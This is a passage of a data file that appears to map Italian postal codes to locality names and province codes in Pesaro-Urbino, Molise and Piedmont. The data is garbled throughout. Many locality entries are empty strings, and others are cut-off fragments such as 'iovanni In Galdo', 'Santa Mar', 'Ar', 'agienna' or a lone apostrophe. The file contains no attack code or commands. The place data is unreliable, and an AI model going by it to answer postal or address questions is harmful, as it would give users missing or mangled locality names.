[["", "PU"], ["Calmazzo", "PU"], ["Fossombrone", "PU"]], "61037": [["Marotta", "PU"], ["Mondolfo", "PU"], ["Centocroci", "PU"]], "61038": [["", "PU"]], "61039": [["", "PU"], ["Cerasa", "PU"]], "61040": [ ["", "PU"], ["Sant'Ippolito", "PU"], ["", "PU"], ["", "PU"], ["", "PU"], ["Mondavio", "PU"], ["", "PU"], ["", "PU"], ["", "PU"], ["Frontone", "PU"], ["Lamoli", "PU"], ["", "PU"], ["Sorbolongo", "PU"], ["Castelvecchio", "PU"], ["Barchi", "PU"], ], "61041": [ ["Acqualagna", "PU"], ["", "PU"], ["Furlo", "PU"], ["Petriccio", "PU"], ["Pole", "PU"], ["Bellaria", "PU"], ], "61042": [["Apecchio", "PU"], ["", "PU"]], "61043": [ ["Secchiano", "PU"], ["", "PU"], ["Smirra", "PU"], ["Pianello", "PU"], ["Cagli", "PU"], ], "61044": [["Pontericcioli", "PU"], ["Chiaserna", "PU"], ["Cantiano", "PU"]], "61045": [["", "PU"], ["Monterolo", "PU"], ["Pergola", "PU"]], "61046": [["Piobbico", "PU"]], "61047": [["San Lorenzo In Campo", "PU"], ["San Vito Sul Cesano", "PU"]], "61048": [["Sant'Angelo In Vado", "PU"]], "61049": [["Muraglione", "PU"], ["Urbania", "PU"]], "61100": [ ["", "PU"], ["Novilara", "PU"], ["", "PU"], ["Muraglia", "PU"], ["", "PU"], ["", "PU"], ["Montegranaro", "PU"], ["Candelara", "PU"], ["Soria", "PU"], ["Pantano", "PU"], ["", "PU"], ["San Pietro In Calibano", "PU"], ["Pesaro", "PU"], ["Santa Mar", "PU"], ["", "PU"], ["Case Bruciate", "PU"], ["Santa Veneranda", "PU"], ["Cattabrighe", "PU"], ["", "PU"], ["Ginestreto", "PU"], ], "61121": [["Pesaro", "PU"]], "61122": [["Pesaro", "PU"]], "86010": [ ["Campodipietra", "CB"], ["iovanni In Galdo", "CB"], ["San Giuliano Del Sannio", "CB"], ["Casalciprano", "CB"], ["Busso", "CB"], ["Tufara", "CB"], ["", "CB"], ["Castropignano", "CB"], ["Ferrazzano", "CB"], ["Oratino", "CB"], ["Roccaspromonte", "CB"], ["Cercepiccola", "CB"], ["Gildone", "CB"], ], "86011": [["Baranello", "CB"]], "86012": [["Cercemaggiore", "CB"]], "86013": [["Gambatesa", "CB"]], "86014": [["Guardiaregia", "CB"]], "86015": [["Jelsi", "CB"]], "86016": [["Riccia", "CB"]], "86017": [["Sepino", "CB"]], "86018": [["Toro", "CB"]], "86019": [["Vinchiaturo", "CB"]], "86020": [ ["Campochiaro", "CB"], ["", "CB"], ["Duronia", "CB"], ["Pietracupa", "CB"], ["", "CB"], ["", "CB"], ["Molise", "CB"], ["Roccavivara", "CB"], ["", "CB"], ["Fossalto", "CB"], ["Spinete", "CB"], ["", "CB"], ], "86021": [ ["Castellone", "CB"], ["Bojano", "CB"], ["Monteverde", "CB"], ["", "CB"], ["", "CB"], ], "86022": [["Limosano", "CB"]], "86023": [["Montagano", "CB"]], "86024": [["", "CB"]], "86025": [["Ripalimosani", "CB"]], "86026": [["Salcito", "CB"]], "86027": [["", "CB"]], "86028": [["", "CB"]], "86029": [["Trivento", "CB"]], "86030": [ ["Castelbottaccio", "CB"], ["Civitacampomarano", "CB"], ["Mafalda", "CB"], ["Lucito", "CB"], ["", "CB"], ["Lupara", "CB"], ["", "CB"], ["Tavenna", "CB"], ["Guardialfiera", "CB"], ["", "CB"], ["Montemitro", "CB"], ["Matrice", "CB"], ], "86031": [["Castelmauro", "CB"]], "86032": [["Montecilfone", "CB"]], "86033": [["", "CB"]], "86034": [["Guglionesi", "CB"]], "86035": [["Larino", "CB"]], "86036": [["", "CB"]], "86037": [["Palata", "CB"]], "86038": [["Collecalcioni", "CB"], ["Petacciato", "CB"]], "86039": [["Termoli", "CB"]], "86040": [ ["Ripabottoni", "CB"], ["Montelongo", "CB"], ["", "CB"], ["Campolieto", "CB"], ["", "CB"], ["", "CB"], ["", "CB"], ["", "CB"], ["Pietracatella", "CB"], ["Monacilioni", "CB"], ["Provvidenti", "CB"], ["Rotello", "CB"], ], "86041": [["Bonefro", "CB"]], "86042": [["Nuova Cliternia", "CB"], ["Campomarino", "CB"], ["", "CB"]], "86043": [["Casacalenda", "CB"]], 
"86044": [["Colletorto", "CB"]], "86045": [["Portocannone", "CB"]], "86046": [["San Martino In Pensilis", "CB"]], "86047": [["Santa ", "CB"]], "86048": [["", "CB"]], "86049": [["Ururi", "CB"]], "86100": [["", "CB"], ["Campobasso", "CB"], ["S", "CB"]], "86070": [ ["", "IS"], ["Scapoli", "IS"], ["Sant'Agapito", "IS"], ["", "IS"], ["", "IS"], ["", "IS"], ["", "IS"], ["Roccaravindola", "IS"], ["R", "IS"], ["Montaquila", "IS"], ["Rocchetta A Volturno", "IS"], ["Con", "IS"], ["Fornelli", "IS"], ], "86071": [["Pizzone", "IS"], ["", "IS"]], "86072": [["Cerro Al Volturno", "IS"], ["Cupone", "IS"]], "86073": [["", "IS"]], "86074": [["Cerasuolo", "IS"], ["Filignano", "IS"]], "86075": [["Monteroduni", "IS"], ["Sant'Eusanio", "IS"]], "86077": [["", "IS"], ["Pozzilli", "IS"]], "86078": [ ["Roccapipirozzi", "IS"], ["", "IS"], ["Selvotta", "IS"], ["Campopino", "IS"], ["Pianura", "IS"], ], "86079": [["Ceppagna", "IS"], ["Venafro", "IS"]], "86080": [ ["", "IS"], ["", "IS"], ["Roccasicura", "IS"], ["", "IS"], ["Miranda", "IS"], ["", "IS"], ["Castelverrino", "IS"], ["Pescopennataro", "IS"], ["", "IS"], ], "86081": [["Agnone", "IS"], ["V", "IS"]], "86082": [["Capracotta", "IS"]], "86083": [["Castiglione", "IS"], ["Carovilli", "IS"]], "86084": [["Vandra", "IS"], ["", "IS"]], "86085": [["Pietrabbondante", "IS"]], "86086": [["", "IS"]], "86087": [["", "IS"]], "86088": [["", "IS"]], "86089": [["Vastogirardi", "IS"], ["Cerreto", "IS"], ["", "IS"]], "86090": [ ["", "IS"], ["Pastena", "IS"], ["Longano", "IS"], ["Guasto", "IS"], ["Indiprete", "IS"], ["Pesche", "IS"], ["Castelpetroso", "IS"], ["Castelpizzuto", "IS"], ], "86091": [["", "IS"]], "86092": [["Roccamandolfi", "IS"], ["", "IS"]], "86093": [["Carpinone", "IS"]], "86094": [["", "IS"]], "86095": [["Frosolone", "IS"], ["", "IS"], ["", "IS"]], "86096": [ ["", "IS"], ["Macchiagodena", "IS"], ["Incoronata", "IS"], ["", "IS"], ], "86097": [["", "IS"], ["Pescolanciano", "IS"], ["Chiauci", "IS"]], "86170": [["Miranda", "IS"], ["Castelromano", "IS"], ["Isernia", "IS"]], "15010": [ ["Grognardo", "AL"], ["", "AL"], ["Merana", "AL"], ["Visone", "AL"], ["", "AL"], ["Ponti", "AL"], ["Pareto", "AL"], ["Prasco", "AL"], ["", "AL"], ["Ricaldone", "AL"], ["", "AL"], ["Terzo", "AL"], ["Cavatore", "AL"], ["Morbello", "AL"], ["", "AL"], ["Melazzo", "AL"], ["Frascaro", "AL"], ["Morsasco", "AL"], ["Ponzone", "AL"], ["Denice", "AL"], ["Cremolino", "AL"], ["", "AL"], ["Gamalero", "AL"], ["", "AL"], ], "15011": [["Moirano", "AL"], ["", "AL"]], "15012": [["Bistagno", "AL"]], "15013": [["", "AL"]], "15014": [["Cantalupo", "AL"]], "15015": [["Cartosio", "AL"], ["Malvicino", "AL"]], "15016": [["Cassine", "AL"], ["Caranzano", "AL"], ["Gavonata", "AL"]], "15017": [["", "AL"]], "15018": [["", "AL"]], "15019": [["Strevi", "AL"]], "15020": [ ["Gabiano", "AL"], ["", "AL"], ["Villamiroglio", "AL"], ["", "AL"], ["", "AL"], ["Zanco", "AL"], ["Casalbagliano", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Lussello", "AL"], ["Montalero", "AL"], ["Brusaschetto", "AL"], ["", "AL"], ["", "AL"], ["Varengo", "AL"], ["", "AL"], ["", "AL"], ["Cereseto", "AL"], ["", "AL"], ["Moncestino", "AL"], ["Murisengo", "AL"], ["Pozzengo", "AL"], ["Camino", "AL"], ["", "AL"], ["Solonghello", "AL"], ["", "AL"], ["Vallegioliti", "AL"], ["Cantavenna", "AL"], ["", "AL"], ["Villadeati", "AL"], ], "15021": [["Cardona", "AL"], ["", "AL"], ["Sanico", "AL"]], "15022": [["Bergamasco", "AL"]], "15023": [["Felizzano", "AL"]], "15024": [["Abbazia", "AL"], ["Masio", "AL"]], "15025": [["", "AL"]], "15026": [["Oviglio", "AL"], 
["Carentino", "AL"]], "15027": [["Pontestura", "AL"]], "15028": [["Piepasso", "AL"], ["Quattordio", "AL"]], "15029": [["Solero", "AL"]], "15030": [ ["", "AL"], ["Terruggia", "AL"], ["Stevani", "AL"], ["Treville", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Conzano", "AL"], ["", "AL"], ["Olivola", "AL"], ["Coniolo", "AL"], ], "15031": [["Balzola", "AL"]], "15032": [["", "AL"]], "15033": [ ["Terranova", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Popolo", "AL"], ["", "AL"], ["Roncaglia", "AL"], ["", "AL"], ], "15034": [["", "AL"]], "15035": [["", "AL"]], "15036": [["Giarole", "AL"]], "15037": [["Lu", "AL"], ["", "AL"]], "15038": [["Ottiglio", "AL"]], "15039": [["", "AL"]], "15040": [ ["Valmadonna", "AL"], ["", "AL"], ["Rivarone", "AL"], ["", "AL"], ["Bozzole", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Ticineto", "AL"], ["", "AL"], ["Piovera", "AL"], ["Occimiano", "AL"], ["", "AL"], ["Valmacca", "AL"], ["", "AL"], ["Giardinetto", "AL"], ["Montecastello", "AL"], ["", "AL"], ["Grava", "AL"], ["'", "AL"], ], "15041": [["Franchini", "AL"], ["", "AL"]], "15042": [["Bassignana", "AL"], ["Mugarone", "AL"], ["Fiondi", "AL"]], "15043": [["Fubine", "AL"]], "15044": [["Quargnento", "AL"]], "15045": [["Sale", "AL"]], "15046": [["", "AL"]], "15048": [["Valenza", "AL"], ["Monte", "AL"], ["Villabella", "AL"]], "15049": [["", "AL"]], "15050": [ ["Guazzora", "AL"], ["Montacuto", "AL"], ["Casasco", "AL"], ["Montemarzino", "AL"], ["Sarezzano", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Momperone", "AL"], ["Avolasca", "AL"], ["Villaromagnano", "AL"], ["Volpeglino", "AL"], ["", "AL"], ["", "AL"], ["Carbonara Scrivia", "AL"], ["Alzano Scrivia", "AL"], ["", "AL"], ["Montegioco", "AL"], ["", "AL"], ["Spineto Scrivia", "AL"], ["Villalvernia", "AL"], ["", "AL"], ["Garbagna", "AL"], ["Paderna", "AL"], ["", "AL"], ], "15051": [["Carezzano", "AL"], ["Castellania", "AL"]], "15052": [["Casalnoceto", "AL"]], "15053": [["Castelnuovo Scrivia", "AL"]], "15054": [["", "AL"], ["Caldirola", "AL"], ["Garadassi", "AL"]], "15055": [["Pontecurone", "AL"]], "15056": [["", "AL"], ["Gremiasco", "AL"], ["Dernice", "AL"]], "15057": [ ["Passalacqua", "AL"], ["Tortona", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ], "15058": [["Viguzzolo", "AL"]], "15059": [["Volpedo", "AL"], ["Monleale", "AL"]], "15060": [ ["", "AL"], ["", "AL"], ["", "AL"], ["Cuquello", "AL"], ["", "AL"], ["Carrosio", "AL"], ["", "AL"], ["Persi", "AL"], ["", "AL"], ["Sardigliano", "AL"], ["Basaluzzo", "AL"], ["", "AL"], ["Castagnola", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Grondona", "AL"], ["", "AL"], ["Voltaggio", "AL"], ["Montaldeo", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Tassarolo", "AL"], ["", "AL"], ["Stazzano", "AL"], ["Pasturana", "AL"], ["Fraconalto", "AL"], ["Bosio", "AL"], ["", "AL"], ], "15061": [["Ar", "AL"]], "15062": [["Donna", "AL"], ["", "AL"], ["Pollastra", "AL"]], "15063": [["", "AL"], ["Gavazzana", "AL"]], "15064": [["Fresonara", "AL"]], "15065": [["Frugarolo", "AL"]], "15066": [["Gavi", "AL"]], "15067": [["", "AL"], ["Merella", "AL"]], "15068": [["", "AL"]], "15069": [["S", "AL"]], "15070": [ ["Castelspina", "AL"], ["Cassinelle", "AL"], ["", "AL"], ["Lerma", "AL"], ["", "AL"], ["Mongiardino", "AL"], ["Trisobbio", "AL"], ["Bandita", "AL"], ["", "AL"], ["", "AL"], ], "15071": [["Carpeneto", "AL"]], "15072": [["Portanova", "AL"], ["", "AL"]], "15073": [["", "AL"]], "15074": [["Molare", "AL"]], "15075": [["Mornese", "AL"]], "15076": [["Gnocchetto", "AL"], ["Ovada", "AL"]], "15077": [["Predosa", "AL"], 
["Castelferro", "AL"]], "15078": [["", "AL"]], "15079": [["Sezzadio", "AL"]], "15100": [ ["", "AL"], ["", "AL"], ["Cascinagrossa", "AL"], ["", "AL"], ["Alessandria", "AL"], ["Lobbi", "AL"], ["Castelceriolo", "AL"], ["Orti", "AL"], ["", "AL"], ["Cristo", "AL"], ["Mandrogne", "AL"], ], "15121": [["Alessandria", "AL"]], "14010": [ ["Cantarana", "AT"], ["", "AT"], ["Dusino", "AT"], ["Antignano", "AT"], ["", "AT"], ["", "AT"], ["", "AT"], ["", "AT"], ["Viale", "AT"], ["", "AT"], ["Cellarengo", "AT"], ["Cortazzone", "AT"], ["", "AT"], ["", "AT"], ], "14011": [["", "AT"]], "14012": [["Ferrere", "AT"]], "14013": [["Castellero", "AT"], ["Monale", "AT"], ["Cortandone", "AT"]], "14014": [["Montafia", "AT"], ["Capriglio", "AT"]], "14015": [["", "AT"], ["", "AT"]], "14016": [["Pratomorone", "AT"], ["Tigliole", "AT"]], "14017": [["Valfenera", "AT"]], "14018": [["Roatto", "AT"], ["Maretto", "AT"], ["", "AT"]], "14019": [["'", "AT"], ["'Asti", "AT"]], "14020": [ ["Robella", "AT"], ["", "AT"], ["Passerano", "AT"], ["Schierano", "AT"], ["Cinaglio", "AT"], ["Marmorito", "AT"], ["Cortanze", "AT"], ["", "AT"], ["", "AT"], ["", "AT"], ["Settime", "AT"], ["", "AT"], ["", "AT"], ["Aramengo", "AT"], ["Cossombrato", "AT"], ["Piea", "AT"], ["Soglio", "AT"], ["", "AT"], ["Corsione", "AT"], ], "14021": [["", "AT"]], "14022": [ ["Becchi", "AT"], ["", "AT"], ["Albugnano", "AT"], ["Castelnuovo ", "AT"], ], "14023": [ ["", "AT"], ["Tonengo", "AT"], ["Cocconito", "AT"], ["Cocconato", "AT"], ["Moransengo", "AT"], ], "14024": [["", "AT"]], "14025": [["", "AT"], ["", "AT"]], "14026": [ ["Montiglio", "AT"], ["Scandeluzza", "AT"], ["Cunico", "AT"], ["Colcavagno", "AT"], ["", "AT"], ["", "AT"], ], "14030": [ ["Refrancore", "AT"], ["", "AT"], ["Valenzani", "AT"], ["Accorneri", "AT"], ["Montemagno", "AT"], ["Frinco", "AT"], ["Scurzolengo", "AT"], ["", "AT"], ["", "AT"], ["Viarigi", "AT"], ["", "AT"], ["Penango", "AT"], ["", "AT"], ], "14031": [["", "AT"], ["Calliano", "AT"], ["Grana", "AT"]], "14032": [["Casorzo", "AT"]], "14033": [["Callianetto", "AT"], ["", "AT"], ["Castell'Alfero", "AT"]], "14034": [["", "AT"], ["Monfallito", "AT"]], "14035": [["", "AT"]], "14036": [["Moncalvo", "AT"]], "14037": [["", "AT"], ["Portacomaro", "AT"], ["Migliandolo", "AT"]], "14039": [["Tonco", "AT"]], "14040": [ ["Cortiglione", "AT"], ["Quaranti", "AT"], ["", "AT"], ["", "AT"], ["", "AT"], ["Vinchio", "AT"], ["Mongardino", "AT"], ["Montabone", "AT"], ["", "AT"], ["Belveglio", "AT"], ["Maranzana", "AT"], ], "14041": [["Agliano", "AT"], ["", "AT"]], "14042": [["", "AT"], ["Calamandrana", "AT"]], "14043": [["", "AT"]], "14044": [["", "AT"], ["Fontanile", "AT"]], "14045": [["Ghiare", "AT"], ["", "AT"], ["Madonna", "AT"]], "14046": [["Bazzana", "AT"], ["Bruno", "AT"], ["Mombaruzzo", "AT"]], "14047": [["Mombercelli", "AT"]], "14048": [["", "AT"], ["", "AT"], ["", "AT"]], "14049": [["", "AT"], ["", "AT"]], "14050": [ ["Cessole", "AT"], ["", "AT"], ["Mombaldone", "AT"], ["", "AT"], ["Serole", "AT"], ["Moasca", "AT"], ["Roccaverano", "AT"], ["", "AT"], ["Cassinasco", "AT"], ], "14051": [["Loazzolo", "AT"], ["Bubbio", "AT"]], "14052": [["Calosso", "AT"]], "14053": [ ["", "AT"], ["Canelli", "AT"], ["Sant'Antonio", "AT"], ["", "AT"], ], "14054": [ ["Coazzolo", "AT"], ["", "AT"], ["", "AT"], ["", "AT"], ["Olmo", "AT"], ], "14055": [["", "AT"], ["Motta", "AT"], ["Boglietto", "AT"]], "14057": [["", "AT"], ["Piano", "AT"], ["", "AT"]], "14058": [["", "AT"], ["Sessame", "AT"]], "14059": [["", "AT"], ["Vesime", "AT"]], "14100": [ ["", "AT"], ["Serravalle", "AT"], 
["Montemarzo", "AT"], ["Valletanaro", "AT"], ["Viatosto", "AT"], ["", "AT"], ["", "AT"], ["Montegrosso", "AT"], ["", "AT"], ["Valleandona", "AT"], ["Sessant", "AT"], ["Valgera", "AT"], ["Variglie", "AT"], ["Mombarone", "AT"], ["", "AT"], ["Asti", "AT"], ["Vaglierano", "AT"], ["Castiglione", "AT"], ["Casabianca", "AT"], ["", "AT"], ["Revignano", "AT"], ], "13811": [["Tavigliano", "BI"], ["", "BI"]], "13812": [ ["", "BI"], ["Quittengo", "BI"], ["", "BI"], ["Balma", "BI"], ["Montesinaro", "BI"], ["Piedicavallo", "BI"], ["", "BI"], ], "13814": [["Pollone", "BI"]], "13815": [["Rosazza", "BI"]], "13816": [["Miagliano", "BI"], ["", "BI"]], "13817": [["Sordevolo", "BI"]], "13818": [["Tollegno", "BI"]], "13821": [["Pianezze", "BI"], ["Callabiana", "BI"], ["Camandona", "BI"]], "13822": [["Pistolesa", "BI"]], "13823": [["", "BI"], ["Strona", "BI"]], "13824": [["Veglio", "BI"]], "13825": [["Crocemosso", "BI"], ["Campore", "BI"]], "13831": [["", "BI"]], "13833": [["Portula", "BI"]], "13835": [ ["Bulliana", "BI"], ["Soprana", "BI"], ["Ponzone", "BI"], ["", "BI"], ["Mosso", "BI"], ["Vico", "BI"], ["Trivero", "BI"], ["Botto", "BI"], ["Pratrivero", "BI"], ["Giardino", "BI"], ], "13836": [["", "BI"], ["Castellengo", "BI"], ["Aglietti", "BI"], ["Cossato", "BI"]], "13841": [["", "BI"], ["Bioglio", "BI"]], "13843": [["Pettinengo", "BI"], ["Vaglio", "BI"]], "13844": [["Piatto", "BI"], ["Ternengo", "BI"]], "13845": [["", "BI"]], "13847": [["Vallanzengo", "BI"], ["", "BI"]], "13848": [["Zumaglia", "BI"]], "13851": [["", "BI"]], "13853": [["Capovilla", "BI"], ["Castello", "BI"], ["Lessona", "BI"], ["Crosa", "BI"]], "13854": [["", "BI"], ["Quaregna", "BI"]], "13855": [["Valdengo", "BI"]], "13856": [["", "BI"], ["Villaggi", "BI"]], "13861": [["Ailoche", "BI"]], "13862": [["Brusnengo", "BI"]], "13863": [["Coggiola", "BI"]], "13864": [["Crevacuore", "BI"], ["Caprile", "BI"]], "13865": [["Curino", "BI"]], "13866": [["Casapinta", "BI"], ["Masserano", "BI"]], "13867": [["Flecchia", "BI"], ["Pray", "BI"], ["", "BI"]], "13868": [["Sostegno", "BI"], ["", "BI"]], "13871": [["Verrone", "BI"], ["Benna", "BI"]], "13872": [["Borriana", "BI"]], "13873": [["Massazza", "BI"]], "13874": [["Mottalciata", "BI"], ["Gifflenga", "BI"]], "13875": [["Ponderano", "BI"]], "13876": [["Sandigliano", "BI"]], "13877": [["", "BI"]], "13878": [["Candelo", "BI"]], "13881": [["Cavaglia'", "BI"], ["Dorzano", "BI"]], "13882": [["Cerrione", "BI"], ["Vergnasco", "BI"], ["Magnonevolo", "BI"]], "13883": [["Roppolo", "BI"]], "13884": [["Torrazzo", "BI"], ["", "BI"]], "13885": [["Brianco", "BI"], ["Salussola", "BI"], ["Vigellio", "BI"]], "13886": [["Viverone", "BI"]], "13887": [["Zimone", "BI"], ["Magnano", "BI"]], "13888": [["Mongrando", "BI"], ["Ceresane", "BI"], ["Curanuova", "BI"], ["Zubiena", "BI"]], "13891": [["Camburzano", "BI"]], "13893": [["Donato", "BI"]], "13894": [["Gaglianico", "BI"]], "13895": [["Graglia", "BI"], ["Muzzano", "BI"], ["", "BI"], ["", "BI"]], "13896": [["Netro", "BI"]], "13897": [["Occhieppo Inferiore", "BI"]], "13898": [["Occhieppo Superiore", "BI"]], "13899": [["Pralungo", "BI"]], "13900": [ ["Chiavazza", "BI"], ["Oropa", "BI"], ["Pavignano", "BI"], ["Biella", "BI"], ["Barazzetto", "BI"], ["Cossila", "BI"], ["Vandorno", "BI"], ["Favaro", "BI"], ], "12010": [ ["Argentera", "CN"], ["Roccasparvera", "CN"], ["Rittana", "CN"], ["Valdieri", "CN"], ["Bersezio", "CN"], ["Moiola", "CN"], ["Pianche", "CN"], ["Bernezzo", "CN"], ["Santa Croce Cervasca", "CN"], ["Aisone", "CN"], ["Santa Croce", "CN"], ["Andonno", "CN"], ["Gaiola", "CN"], 
["", "CN"], ["Vignolo", "CN"], ["San Defendente", "CN"], ["Valloriate", "CN"], ["Cervasca", "CN"], ["Entracque", "CN"], ["Vinadio", "CN"], ["", "CN"], ["Sant'Anna", "CN"], ["Pietraporzio", "CN"], ["Roaschia", "CN"], ["Sambuco", "CN"], ["San Rocco Di Bernezzo", "CN"], ], "12011": [["", "CN"], ["", "CN"], ["", "CN"]], "12012": [ ["Boves", "CN"], ["Cerati", "CN"], ["Fontanelle", "CN"], ["Mellana", "CN"], ["San Giacomo", "CN"], ["Rivoira", "CN"], ["San Giacomo Di Boves", "CN"], ], "12013": [["", "CN"], ["San Bartolomeo", "CN"]], "12014": [["Festiona", "CN"], ["Demonte", "CN"]], "12015": [["", "CN"]], "12016": [["Peveragno", "CN"], ["", "CN"], ["", "CN"]], "12017": [["Robilante", "CN"]], "12018": [["Brignola", "CN"], ["Roccavione", "CN"], ["", "CN"]], "12019": [["Vernante", "CN"]], "12020": [ ["Casteldelfino", "CN"], ["Monsola", "CN"], ["Elva", "CN"], ["Roccabruna", "CN"], ["Sampeyre", "CN"], ["", "CN"], ["Marmora", "CN"], ["Frassino", "CN"], ["Venasca", "CN"], ["", "CN"], ["Lemma", "CN"], ["Canosio", "CN"], ["Macra", "CN"], ["Melle", "CN"], ["Brossasco", "CN"], ["Rore", "CN"], ["Valgrana", "CN"], ["Pontechianale", "CN"], ["Villar", "CN"], ["", "CN"], ["Stroppo", "CN"], ["Isasca", "CN"], ["Vottignasco", "CN"], ["Castelmagno", "CN"], ["Cartignano", "CN"], ["Villafalletto", "CN"], ["Bellino", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Rossana", "CN"], ["Tarantasca", "CN"], ], "12021": [["Acceglio", "CN"]], "12022": [["", "CN"], ["Valmala", "CN"], ["Busca", "CN"], ["", "CN"]], "12023": [["Caraglio", "CN"]], "12024": [["", "CN"]], "12025": [["", "CN"], ["Dronero", "CN"]], "12026": [["Piasco", "CN"]], "12027": [["Pradleves", "CN"]], "12028": [["", "CN"], ["Prazzo", "CN"]], "12029": [["Lottulo", "CN"], ["", "CN"]], "12030": [ ["Scarnafigi", "CN"], ["", "CN"], ["Envie", "CN"], ["Rifreddo", "CN"], ["Cavallermaggiore", "CN"], ["Gambasca", "CN"], ["", "CN"], ["Marene", "CN"], ["Lagnasco", "CN"], ["", "CN"], ["Faule", "CN"], ["Murello", "CN"], ["Ostana", "CN"], ["Pagno", "CN"], ["Manta", "CN"], ["Oncino", "CN"], ["", "CN"], ["", "CN"], ["Brondello", "CN"], ["Sanfront", "CN"], ["Polonghera", "CN"], ["Casalgrasso", "CN"], ["Crissolo", "CN"], ["", "CN"], ["Cavallerleone", "CN"], ["Carde'", "CN"], ["Ruffia", "CN"], ["", "CN"], ], "12031": [["", "CN"]], "12032": [["Galleane", "CN"], ["Barge", "CN"]], "12033": [["Moretta", "CN"]], "12034": [["Paesana", "CN"]], "12035": [["Racconigi", "CN"]], "12036": [["Staffarda", "CN"], ["Revello", "CN"]], "12037": [ ["Cervignasco", "CN"], ["Saluzzo", "CN"], ["", "CN"], ["", "CN"], ["Castellar", "CN"], ["", "CN"], ], "12038": [["Savigliano", "CN"], ["Levaldigi", "CN"]], "12039": [["Verzuolo", "CN"], ["Villanovetta", "CN"], ["Falicetto", "CN"]], "12040": [ ["", "CN"], ["Morozzo", "CN"], ["", "CN"], ["Genola", "CN"], ["", "CN"], ["", "CN"], ["Cervere", "CN"], ["", "CN"], ["Priocca", "CN"], ["Canove", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Margarita", "CN"], ["Montanera", "CN"], ["Govone", "CN"], ["", "CN"], ["Trucchi", "CN"], ["", "CN"], ["Sanfre'", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Salmour", "CN"], ], "12041": [["", "CN"], ["Isola", "CN"], ["agienna", "CN"]], "12042": [["Bandito", "CN"], ["Bra", "CN"], ["Pollenzo", "CN"]], "12043": [["Canale", "CN"], ["Valpone", "CN"]], "12044": [["", "CN"], ["", "CN"], ["Centallo", "CN"]], "12045": [ ["Piovani", "CN"], ["Murazzo", "CN"], ["Gerbo", "CN"], ["unia", "CN"], ["San Sebastiano", "CN"], ["Tagliata", "CN"], ["San Vittore", "CN"], ["Fossano", "CN"], ["Maddalene", "CN"], ], "12046": [["", "CN"], ["Monta'", "CN"], 
["San Rocco Monta'", "CN"]], "12047": [["", "CN"], ["Crava", "CN"]], "12048": [["", "CN"]], "12049": [["Trinita'", "CN"]], "12050": [ ["Feisoglio", "CN"], ["Baraccone", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Guarene", "CN"], ["", "CN"], ["Castagnito", "CN"], ["Neviglie", "CN"], ["Borgomale", "CN"], ["Treiso", "CN"], ["", "CN"], ["Arguello", "CN"], ["Rodello", "CN"], ["Sinio", "CN"], ["Castellinaldo", "CN"], ["Benevello", "CN"], ["", "CN"], ["Sant'Antonio", "CN"], ["", "CN"], ["Barbaresco", "CN"], ["", "CN"], ["", "CN"], ["Vaccheria", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Castelrotto", "CN"], ["Cravanzana", "CN"], ["Castino", "CN"], ["Bosia", "CN"], ["", "CN"], ["Roddino", "CN"], ["Cissone", "CN"], ], "12051": [["Mussotto", "CN"], ["Alba", "CN"]], "12052": [["Neive", "CN"], ["", "CN"], ["Borgonovo", "CN"]], "12053": [["", "CN"], ["", "CN"]], "12054": [["", "CN"], ["", "CN"]], "12055": [["", "CN"], ["", "CN"], ["", "CN"], ["Ricca", "CN"]], "12056": [["San Donato", "CN"], ["", "CN"], ["Mango", "CN"]], "12058": [["Camo", "CN"], ["Valdivilla", "CN"], ["", "CN"]], "12060": [ ["", "CN"], ["", "CN"], ["Bossolasco", "CN"], ["Farigliano", "CN"], ["", "CN"], ["Clavesana", "CN"], ["Somano", "CN"], ["Roddi", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Marsaglia", "CN"], ["", "CN"], ["Piozzo", "CN"], ["", "CN"], ["Macellai", "CN"], ["Igliano", "CN"], ["", "CN"], ["Barolo", "CN"], ["", "CN"], ["Gallo", "CN"], ["Verduno", "CN"], ["'", "CN"], ["'", "CN"], ["Bonvicino", "CN"], ["Ciglie'", "CN"], ["Murazzano", "CN"], ["", "CN"], ["Pocapaglia", "CN"], ["Novello", "CN"], ["Monchiero", "CN"], ], "12061": [["Carru'", "CN"]], "12062": [["", "CN"], ["Cherasco", "CN"], ["Roreto", "CN"]], "12063": [["Dogliani", "CN"]], "12064": [["Rivalta", "CN"], ["", "CN"]], "12065": [["Perno", "CN"], ["", "CN"]], "12066": [["Borgo", "CN"], ["", "CN"]], "12068": [["Narzole", "CN"]], "12069": [ ["Cinzano", "CN"], ["Villa", "CN"], ["toria D'", "CN"], ["Santa Vittoria D'Alba", "CN"], ], "12070": [ ["Montezemolo", "CN"], ["Perlo", "CN"], ["Mombarcaro", "CN"], ["Priero", "CN"], ["Bragioli", "CN"], ["Viola", "CN"], ["Nucetto", "CN"], ["Lisio", "CN"], ["Paroldo", "CN"], ["", "CN"], ["Scagnello", "CN"], ["Alto", "CN"], ["", "CN"], ["Sale San Giovanni", "CN"], ["Gorzegno", "CN"], ["Levice", "CN"], ["Castelnuovo Di Ceva", "CN"], ["", "CN"], ["Gottasecca", "CN"], ["Priola", "CN"], ["Torresina", "CN"], ["Sale Delle Langhe", "CN"], ["Battifollo", "CN"], ["Perletto", "CN"], ["Caprauna", "CN"], ["Mombasiglio", "CN"], ], "12072": [["Camerana", "CN"]], "12073": [["Ceva", "CN"], ["Roascio", "CN"]], "12074": [["Bergolo", "CN"], ["Cortemilia", "CN"]], "12075": [ ["Garessio", "CN"], ["", "CN"], ["Cerisola", "CN"], ["", "CN"], ["Trappa", "CN"], ], "12076": [["Lesegno", "CN"]], "12077": [["Prunetto", "CN"], ["Monesiglio", "CN"]], "12078": [["Ormea", "CN"], ["", "CN"]], "12079": [["Saliceto", "CN"]], "12080": [ ["Pra'", "CN"], ["'", "CN"], ["Monasterolo Casotto", "CN"], ["Monastero Di Vasco", "CN"], ["Vicoforte", "CN"], ["Santuario Di Vicoforte", "CN"], 